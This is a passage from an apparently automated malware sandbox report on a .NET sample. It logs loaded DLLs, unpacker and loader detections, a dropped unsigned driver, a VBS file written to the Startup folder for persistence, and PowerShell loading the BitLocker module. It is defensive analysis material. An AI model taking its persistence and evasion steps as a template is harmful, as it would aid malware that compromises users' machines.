                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: ZppxPm0ASs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: ZppxPm0ASs.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.2821462195.000001FDF361E000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.2821462195.000001FDF361E000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: ZppxPm0ASs.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: IsStopped.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.ZppxPm0ASs.exe.1fdea5b3ec8.6.raw.unpack, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.ZppxPm0ASs.exe.1fdea4557b0.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.ZppxPm0ASs.exe.1fdea4557b0.2.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.ZppxPm0ASs.exe.1fdea4557b0.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.ZppxPm0ASs.exe.1fdea4557b0.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.ZppxPm0ASs.exe.1fdea4557b0.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.ZppxPm0ASs.exe.1fdd9e10000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.ZppxPm0ASs.exe.1fdd9e10000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.ZppxPm0ASs.exe.1fdd9e10000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.ZppxPm0ASs.exe.1fdd9e10000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.ZppxPm0ASs.exe.1fdd9e10000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.ZppxPm0ASs.exe.1fdf2d60000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.ZppxPm0ASs.exe.1fdebbfe4b8.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2690759712.000001FDF2D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1449279227.000001FDD9F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1482651913.000001FDEBA61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ZppxPm0ASs.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IsStopped.exe PID: 7324, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC46C79E push cs; retf 0_2_00007FFAAC46C79F
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC637582 push F1812613h; iretd 0_2_00007FFAAC637589
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC627EF2 push ebx; ret 0_2_00007FFAAC627F1A
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC627967 push ebx; retf 0_2_00007FFAAC62796A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC37D2A5 pushad ; iretd 8_2_00007FFAAC37D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC4909A2 push E85E025Dh; ret 8_2_00007FFAAC4909F9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC491B05 push edi; iretd 8_2_00007FFAAC491C93
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC491C64 push edi; iretd 8_2_00007FFAAC491C93
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC562316 push 8B485F91h; iretd 8_2_00007FFAAC56231B
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC45C79E push cs; retf 23_2_00007FFAAC45C79F
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC627582 push F1812613h; iretd 23_2_00007FFAAC627589
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeCode function: 23_2_00007FFAAC617967 push ebx; retf 23_2_00007FFAAC61796A

                  Persistence and Installation Behavior

                  barindex
                  Sample is not signed and drops a device driver
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeFile created: C:\Users\user~1\AppData\Local\Temp\lkpwsyczzfuj.sysJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sysJump to dropped file
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile created: C:\Users\user\AppData\Roaming\IsStopped.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsStopped.vbsJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
